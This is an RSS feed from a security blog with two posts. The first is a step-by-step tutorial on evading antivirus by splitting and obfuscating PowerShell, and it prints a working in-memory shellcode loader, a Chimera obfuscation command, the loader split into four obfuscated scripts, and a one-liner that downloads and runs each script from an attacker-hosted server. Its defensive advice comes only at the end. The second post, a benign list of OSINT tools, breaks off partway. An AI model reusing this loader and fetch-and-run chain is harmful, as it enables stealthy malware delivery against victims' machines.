<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>hackers &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/hackers/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Sun, 20 Jul 2025 03:17:51 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.1</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>hackers &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to use hackers use Splitfus to execute PowerShell malicious code</title>
		<link>https://en.anonyviet.com/how-to-use-hackers-use-splitfus-to-execute-powershell-malicious-code/</link>
					<comments>https://en.anonyviet.com/how-to-use-hackers-use-splitfus-to-execute-powershell-malicious-code/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 20 Jul 2025 03:17:51 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[execute]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[malicious]]></category>
		<category><![CDATA[PowerShell]]></category>
		<category><![CDATA[Splitfus]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=19612</guid>

					<description><![CDATA[Currently, defensive systems such as Antivirus (AV) and Endpoint detection &#038; response (EDR) are increasingly strong. However, hackers are constantly creating sophisticated techniques to overcome this protective layer. One of the common techniques is Splitfus. This is the method of dividing the PowerShell code and disturbing the code (Obfuscate), then executing each part in many [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Currently, defensive systems such as Antivirus (AV) and Endpoint detection &#038; response (EDR) are increasingly strong. However, hackers are constantly creating sophisticated techniques to overcome this protective layer. One of the common techniques is <strong>Splitfus.</strong> This is the method of dividing the PowerShell code and disturbing the code (Obfuscate), then executing each part in many stages (staged deliver). So why is this technique so effective? Let&#8217;s find out with me!</p>
<div align="center">
<table class="aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"> <span style="font-size: 12pt;"> <strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">Anonyviet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" class="local-link">Link</a></span>  👈</strong> </span> </td>
</tr>
</tbody>
</table>
</div>
<p>Splitfus (abbreviated for <strong>Split + Obfusication</strong>) is the technique that hackers use to:</p>
<ul>
<li><strong>Split (Split)</strong> Powershell malware into many paragraphs, for example: malware1.ps1, malware2.ps1, malware3.ps1, &#8230;</li>
<li><strong>Obfuscate (Obfuscate)</strong> Each code to avoid being analyzed or detected by AV&#8217;s signature</li>
<li><strong>Execution in many stages (stageding)</strong>: When performing the attack, the victim will download each code from the hacker server and run directly in the memory, instead of saving the entire Payload on the disc. This is a realistic type that is commonly known as <strong>Multi-Stage Attack</strong> or <strong>Fileless malware</strong></li>
</ul>
<ul>
<li><strong>Reducing the possibility of being detected by signature-based detection</strong></li>
<li>Traditional AV is based on signatures or unique designs. When the malicious code is broken down and encoded, there is no paragraph containing the entire Payload, making the detection difficult.</li>
<li><strong>Avoid scanning and sandbox</strong>
<ul>
<li>If the entire Payload is in a file, AV is easy to analyze before running</li>
<li>With Splitfus, the monopoly is dynamic (on-demand) from the hacker server, so the sandbox environment is difficult to recreate the entire process</li>
</ul>
</li>
<li><strong>BYPASS AMSI (Antimalware Scan Interface)</strong></li>
<li>Windows Amsi is capable of scanning PowerShell content before execution. However, with Splitfus:
<ul>
<li>Small codes, Obfuscated and dynamic loads → difficult to be fully analyzed by Amsi</li>
<li>Many hackers also combine <strong>Amsi bypass</strong> With Splitfus to increase efficiency</li>
</ul>
</li>
<li><strong>Flexible and easy to update</strong></li>
<li>Hackers can change any segment on the server without spreading the entire Payload. This makes it harder for tracing or developing AV signatures</li>
</ul>
<p>The simple theoretical part is so short, now I will take the actual example for you to easily imagine how the technique is done</p>
<p>Many APT and Malware Framework attack campaigns like <strong>Cobalt Strike, PowerShell Empire, Metasploit</strong> has applied the same mechanism as Splitfus to spread Payload Staged. This is a popular trend in current fileless attacks.</p>
<p>Alright, now I try to run a piece of PowerShell code: Write-Host &#8220;Invoke-Mimikatz&#8221;. Oh you see, Antivirus discovered and blocked this code. This is only a piece of code printing out the string on the Terminal, why is it blocked? Because it contains a string of characters <strong>&#8220;Invoke-Mimikatz&#8221;</strong>. This is one <strong>Signature (signature)</strong> Extremely famous and typical of the attack tool <strong>Mimikatz</strong></p>
<p><img decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2025/07/screenshot-2025-07-18-221618-png.png" alt="Screenshot 2025-07-18 221618.PNG" title="How to use hackers use Splitfus to execute PowerShell 9 Code"/></p>
<p>Thus, the AVs are configured to immediately block any code containing this dangerous signature, even at the earliest stage, to prevent all potential intentions related to Mimikatz. This is a risk prevention measure.</p>
<p>So we already know how to AV is configured, now try separating the &#8220;Invoke-Mimikatz&#8221; string into many different short chains.</p>
<p><img decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2025/07/screenshot-2025-07-18-221712-png.png" alt="Screenshot 2025-07-18 221712.Png" title="How to use hackers use Splitfus technique to execute PowerShell 10 malicious code"/></p>
<p>As you can see, although separating the chain into small parts such as &#8220;Invo&#8221;, &#8220;ke&#8221;, &#8220;-mim&#8221;, &#8220;ikatz&#8221;, AV still does not detect malicious code. Later, when we resumed these strings in the process of implementing the results, &#8220;Invoke-Mimikatz&#8221; but has surpassed AV&#8217;s detection system. This is the simplest example of Splitfus</p>
<p>Now let&#8217;s see a more realistic exploitation example with the following PowerShell code, with the file called SC-Boriginal.ps1</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,&#13;
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,&#13;
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,&#13;
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,&#13;
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,&#13;
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,&#13;
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)&#13;
&#13;
function LookupFunc {&#13;
Param ($moduleName, $functionName)&#13;
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')&#13;
$tmp = $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}&#13;
$handle = $assem.GetMethod('GetModuleHandle').Invoke($null, @($moduleName));&#13;
[IntPtr] $result = 0;&#13;
try {&#13;
Write-Host "First Invoke - $moduleName $functionName";&#13;
$result = $tmp[0].Invoke($null, @($handle, $functionName));&#13;
}catch {&#13;
Write-Host "Second Invoke - $moduleName $functionName";&#13;
$handle = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $handle);&#13;
$result = $tmp[0].Invoke($null, @($handle, $functionName));&#13;
}&#13;
return $result;&#13;
}&#13;
&#13;
function getDelegateType {&#13;
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])&#13;
$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])&#13;
$type.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')&#13;
$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')&#13;
return $type.CreateType()&#13;
}&#13;
&#13;
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $shellcode.Length, 0x3000, 0x40)&#13;
[System.Runtime.InteropServices.Marshal]::Copy($shellcode, 0, $lpMem, $shellcode.Length)&#13;
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)</pre>
<p>This is the PowerShell code to execute the Shellcode of Calc.exe on Windows, if we execute the entire code, it will be blocked by AV. And now I will apply Splitfus technique. First I will use the tool <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Ftokyoneon%2FChimera.git" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Chima</a> To disturb this code, it becomes harder to read with the following statement</p>
<p><code>./chimera.sh -f sc-original.ps1 -l 3 -v -t -s -b -j -o sc-obf.ps1</code></p>
<p><img decoding="async" class="aligncenter" src="https://anonyviet.com/wp-content/uploads/2025/07/screenshot-2025-07-19-121306-png.png" alt="Screenshot 2025-07-19 121306.png" title="How to use hackers use Splitfus technique to execute PowerShell 11 Code"/></p>
<p>Now, the PowerShell code was initially tangled by changing. Next, I will divide this file into smaller parts to execute in a discrete manner, making the security system unable to detect the typical signature of Shellcode</p>
<p>Next, I divided the SC-OBF.PS1 file into 4 separate files: SC1.PS1 (containing the shellcode storage variable), SC2.PS1 (containing the tangled LookupFunc function), SC3.PS1 (containing the tangled GetDelegatetype) and SC4.PS1 (containing the last 3 lines of code). Each part of this part is scanned individually will not cause warnings from AV. This is a disturbed and separate code of each file as I said</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc1.ps1&#13;
[Byte[]] $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,&#13;
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,&#13;
0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17,&#13;
0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17,&#13;
0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F,&#13;
0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4,&#13;
0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3)</pre>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc2.ps1&#13;
function iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs {&#13;
Param ($JzGCXcYJmJdQKoCerSqNXT, $LaHgzlZeSdXkwSwksNKHLbDEymlFp)&#13;
$FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.UnsafeNativeMethods')&#13;
$jWwCsHjXRPShPEyyEBpzOw = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$_}}&#13;
$aFUfleAnufbxjgylCpxMoZnlpUkts = $FTNFeBumwTgCKnnMPmVEdfKoaWinKHpxBMujd.GetMethod('GetModuleHandle').Invoke($null, @($JzGCXcYJmJdQKoCerSqNXT));&#13;
[IntPtr] $XHcKpPqwXEaSejzfchayBW = 0;&#13;
try {&#13;
Write-Host "First Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";&#13;
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));&#13;
}catch {&#13;
Write-Host "Second Invoke - $JzGCXcYJmJdQKoCerSqNXT $LaHgzlZeSdXkwSwksNKHLbDEymlFp";&#13;
$aFUfleAnufbxjgylCpxMoZnlpUkts = new-object -TypeName System.Runtime.InteropServices.HandleRef -ArgumentList @($null, $aFUfleAnufbxjgylCpxMoZnlpUkts);&#13;
$XHcKpPqwXEaSejzfchayBW = $jWwCsHjXRPShPEyyEBpzOw[0].Invoke($null, @($aFUfleAnufbxjgylCpxMoZnlpUkts, $LaHgzlZeSdXkwSwksNKHLbDEymlFp));&#13;
}&#13;
return $XHcKpPqwXEaSejzfchayBW;&#13;
}</pre>
</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc3.ps1&#13;
function DdKSsQGFmFfVhpHEtVzHaZFCWQGs {&#13;
Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $GVUAdTXmnEpoFzPorhRfka,[Parameter(Position = 1)] [Type] $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB = [Void])&#13;
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType','Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])&#13;
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')&#13;
$YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $RRqnOWxmsxKutFBpzSBCMlckCOfBNELkuuJsUOnHsB, $GVUAdTXmnEpoFzPorhRfka).SetImplementationFlags('Runtime, Managed')&#13;
return $YPjndxTHFIcbnisDBdfZAiWWMORMQEMwWeH.CreateType()&#13;
}</pre>
</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#sc4.ps1&#13;
$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll VirtualAlloc),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length, 0x3000, 0x40)&#13;
[System.Runtime.InteropServices.Marshal]::Copy($LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe, 0, $WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH, $LthwJuMUAmqvMRjAPliXdGwmLaXmjcSvILeKSAWVe.Length)&#13;
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((iRsUmgOEtIChVLeYYQcNrgKkLwHyChhaXKTDqfFcEs kernel32.dll CreateThread),(DdKSsQGFmFfVhpHEtVzHaZFCWQGs @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$WCUBLvVuyTuTmQBWbcWjbjzYViRFjOXfFH,[IntPtr]::Zero,0,[IntPtr]::Zero)</pre>
<p>The steps to perform this Splitfus technique are also very simple. First, I used the following command to initialize the Python server on port 80 with the IP address of 192.168.1.17:</p>
<p><code>python3 -m http.server 80</code></p>
<p>This server will save the Script PowerShell files that have been separated and tangled, allowing the victim&#8217;s machine to download separate parts.</p>
<p>Finally, I created a brief execution command to execute on the victim&#8217;s machine</p>
<p><code>1..4 | ForEach-Object { IEX (New-Object System.Net.WebClient).DownloadString("http://192.168.1.17/sc$_.ps1") }</code></p>
<p>This command will download and execute each script file from SC1.PS1 to SC4.PS1. This is an effective way to overcome malicious detection mechanisms because each individual part can look harmless. When combined, they form a complete attack that many security solutions cannot be detected</p>
<p><img decoding="async" src="https://anonyviet.com/wp-content/uploads/2025/07/word-image-91200-4.gif" alt="How to use hackers use Splitfus technique to execute PowerShell 5 malicious code" title="How to use hackers use Splitfus technique to execute PowerShell 12 Code"/></p>
<p>With Metasploit, creating Shellcode becomes much easier. I will use the MSFVENOM command to create a new shellcode, then replace it with SC1.PS1. This allows me to customize the attack in many different directions, from taking the victim&#8217;s computer to steal information or install Backdoor</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fstreamable.com%2Frwoo4k" target="_blank" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">https://stroamable.com/rwoo4k</a></p>
<p>And these are simple examples, but in fact, PowerShell malicious code is not so simple. Hackers will have to use more techniques <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fbypass-amsi-va-thuc-thi-ma-doc-tren-windows%2F" class="local-link">BYPASS Amsi</a> To increase the success rate</p>
<h2 id="ftoc-cach-phong-thu-truoc-ky-thuat-splitfus" class="ftwp-heading"><strong>How to defend before Splitfus</strong></h2>
<p>Splitfus technique is one of the sophisticated powerhell attack methods, difficult to detect if the system is not closely monitored. In order to effectively defend before Splitfus, the network security team needs to synchronously deploy many active measures, from monitoring behavior to building an early warning system and ending training.</p>
<h3 id="ftoc-tang-cuong-giam-sat-powershell" class="ftwp-heading"><strong> Strengthen PowerShell monitoring</strong></h3>
<p>PowerShell is a tool that is often abused in modern attacks. To monitor abnormal operations, the system needs to turn on the Script Block Logging Diary feature (using the Event ID 4104) in combination with the logging module. These settings help save the entire PowerShell command that were executed, even when the OBFUSCATE was tangled. In addition, it is advisable to activate the Constrained Language Mode to limit the use of dangerous commands in the PowerShell execution environment.</p>
<h3 id="ftoc-kich-hoat-va-bao-ve-amsi-antimalware-scan-interface" class="ftwp-heading"><strong>Activate and protect AMSI (Antimalware Scan Interface)</strong></h3>
<p>Amsi is an important defense class that helps analyze the code before being executed in PowerShell. Make sure that Amsi is always enabled and not overcome (BYPASS) is essential. When integrated with Microsoft Defender or EDR solutions that support Amsi scanning, the ability to detect malicious code will be significantly improved, helping to prevent attacks from Splitfus early.</p>
<h3 id="ftoc-kiem-tra-hanh-vi-tai-dong-trong-he-thong" class="ftwp-heading"><strong>Check the dynamic load in the system</strong></h3>
<p>A common feature of Splitfus is to use dangerous parameters in PowerShell such as Encodedcommand or call the IEX function to download remote code via chain such as (New-Object net.webclient) .Downloadstring. The EDR or HIDS systems need to be configured to identify these behaviors. At the same time, it is necessary to be alert when detecting the script downloaded from unnecessary domain, especially the HTTP GET requirements containing the tail files .ps1.</p>
<h3 id="ftoc-thiet-lap-kiem-soat-truy-cap-mang-chat-che" class="ftwp-heading"><strong>Strict network access control</strong></h3>
<p>The network access control plays an important role in preventing Splitfus from communicating with the control server (C2 Server). It is necessary to actively block outbound connections to IP addresses or suspected domain. The proxy configuration combined with TLS test (TLS Inspection) will help detect the acting behavior hidden under encrypted connections. In addition, continuous updates of attack indicators (IOC) from Threat Intelligence Feed will improve the ability to identify and respond promptly.</p>
<p>Finally, the human element is always the weakest link in the defense chain. Propagating and training end users to raise security awareness is mandatory. Staff should be instructed not to run script from unclear sources. At the same time, the skill of identifying the fake email (Phishing) should also be focused because this is usually the starting point of Splitfus attacks.</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-use-hackers-use-splitfus-to-execute-powershell-malicious-code/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2025/07/word-image-91200-5.png" medium="image"></media:content>
            	</item>
		<item>
		<title>10 OSINT tools that hackers need to know</title>
		<link>https://en.anonyviet.com/10-osint-tools-that-hackers-need-to-know/</link>
					<comments>https://en.anonyviet.com/10-osint-tools-that-hackers-need-to-know/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 29 May 2024 02:53:24 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[OSINT]]></category>
		<category><![CDATA[tools]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=15740</guid>

					<description><![CDATA[OSINT stands for “open source intelligence”. This concept refers to finding information that you can legally access, through legal means. OSINT is primarily performed online, but it can also be performed offline. Pentesters use OSINT to research their targets, and threat intelligence experts use OSINT to learn about cyber threats. OSINT is an important tool [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>OSINT stands for “open source intelligence”.  This concept refers to finding information that you can legally access, through legal means.  OSINT is primarily performed online, but it can also be performed offline.  Pentesters use OSINT to research their targets, and threat intelligence experts use OSINT to learn about cyber threats.  OSINT is an important tool for both red and blue teams.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="15740" fifu-featured="1" loading="lazy" decoding="async" class="aligncenter wp-image-40742 size-full" src="https://anonyviet.com/wp-content/uploads/2022/04/nCvGCqXf8CQUr7Vfm1aY61TZHJ8luL5P.jpg" alt="10 OSINT tools that hackers need to know" title="10 OSINT tools that hackers need to know" width="1170" height="660" title="10 OSINT tools that hackers need to know 19" srcset="https://anonyviet.com/wp-content/uploads/2022/04/nCvGCqXf8CQUr7Vfm1aY61TZHJ8luL5P.jpg 1170w, https://anonyviet.com/wp-content/uploads/2022/04/nCvGCqXf8CQUr7Vfm1aY61TZHJ8luL5P-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2022/04/nCvGCqXf8CQUr7Vfm1aY61TZHJ8luL5P-1024x578.jpg 1024w, https://anonyviet.com/wp-content/uploads/2022/04/nCvGCqXf8CQUr7Vfm1aY61TZHJ8luL5P-768x433.jpg 768w, https://anonyviet.com/wp-content/uploads/2022/04/nCvGCqXf8CQUr7Vfm1aY61TZHJ8luL5P-750x423.jpg 750w, https://anonyviet.com/wp-content/uploads/2022/04/nCvGCqXf8CQUr7Vfm1aY61TZHJ8luL5P-1140x643.jpg 1140w" sizes="auto, (max-width: 1170px) 100vw, 1170px"/></p>
<p>Below are some of the most popular tools for OSINT.</p>
<h2 id="ftoc-10-cong-cu-osint-ma-hacker-can-biet" class="ftwp-heading">10 OSINT tools that hackers need to know</h2>
<h3 id="ftoc-shodan" class="ftwp-heading">Shodan</h3>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fhuong-dan-giai-bai-ve-shodan-io-tren-tryhackme%2F" class="local-link" rel="noopener">Shodan </a>is a search engine for exploitable network devices on the internet, such as servers and IoT devices.  Exploitable means publicly accessible.  It is possible to place a server, IoT peripheral or network device on the internet and configure it to be relatively private and difficult to fingerprint.  But if a device is connected to the Internet without careful security configuration, you can find it through Shodan with the right searches.</p>
<p>Using Shodan without a premium account will return a very limited number of search results.  A premium account is a lot more useful if the type of OSINT cyber research you do requires exploring servers, network devices, and IoT peripherals (such as cameras).</p>
<h3 id="ftoc-maltego" class="ftwp-heading">Maltego</h3>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.maltego.com%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Maltego</a> runs as a dedicated application for Windows, Mac and Linux desktops, allowing users to access multiple data sources for OSINT, journalistic research and forensics purposes.  There are over 58 data sources in Maltego as of this writing, including Google Maps geocoding, AlienVault OTX, ATII Hades Darkweb Intelligence, Blockchain.info, Crowdstrike, VirusTotal, and many others.  I hope the number of data sources integrated into Maltego will increase over time.</p>
<p>The value that Maltego provides to researchers is not only in its vast collection of data sources but also in the way its platform can show users data patterns and trends through visual charts Highly customizable.  Up to one million entities can be plotted in the chart that Maltego creates.</p>
<p>Of course, you can take advantage of all of Maltego&#39;s features but it&#39;s not free, although they will let you see a demo before you decide to sign up.  But if you don&#39;t want to pay, the free Maltego Community Edition can still be very useful.</p>
<h3 id="ftoc-google-dorks" class="ftwp-heading">Google Dorks</h3>
<p>Google Dorks is not an app.  Rather, it is a technique that uses the Google search engine that everyone uses every day.  Don&#39;t go looking for the official Google Dorks app, it doesn&#39;t exist.  But there are developers who have developed open source software tools for Google Dorking that you can try, such as <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fawesomeopensource.com%2Fproject%2Fopsdisk%2Fpagodo" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Pagodo</a> and <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fawesomeopensource.com%2Fproject%2Fnerrorsec%2FGoogleDorker" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">GoogleDorker</a>.</p>
<p>A typical Google Dorking strategy starts by using simple search queries and then moves on to more complex queries.  Most people just type strings of text into Google searches, such as “weather forecast” or “abc xyz”.  But there are a number of search operators that can be used in Google searches to return more results than you intended.  For example, you can try “site:anonyviet.com” to search specifically on your site, or use quotation marks around a search term to return only results that use the search term. look for that exact thing.  Google offers a list of tips for refining your Google searches <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fsupport.google.com%2Fwebsearch%2Fanswer%2F2466433" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here</a>.</p>
<p>A lot of websites are very poorly configured when it comes to cybersecurity.  Google&#39;s web crawling bots are most effective on the web when they have access to explore.  So, Google Dorking can be a technique to find data such as email addresses, login information, and bank numbers that have not been properly secured.</p>
<h3 id="ftoc-recon-ng" class="ftwp-heading">Recon-ng</h3>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Flanmaster53%2Frecon-ng" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Recon-ng</a> is an open source web reconnaissance tool.  Its power will be increased by the modules you can install to it.  If you use Recon-ng effectively, you can save a lot of time in OSINT research.</p>
<p>Recon-ng can be run from the command line.  If you want to make Recon-ng useful for your purposes, select the Marketplace option from the main menu and explore what&#39;s available.  There are a huge number of modules you can try out, with more being improved and added continuously.</p>
<p>If you&#39;re comfortable with the command line and you want OSINT to work much more efficiently, Recon-ng may become one of your favorite tools.</p>
<h3 id="ftoc-ahmia-fi" class="ftwp-heading">Ahmia.fi</h3>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fahmia.fi%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Ahmia.fi</a> is a search engine specifically for finding sites on the Tor Network, although the search engine itself is also accessible on the “clearnet”.  But you will need Tor Browser to open your Tor search results.</p>
<p>Many marketplaces and forums are located on the Tor Network, so making effective use of the Ahmia.fi search engine can be a great method for your OSINT forensics work.</p>
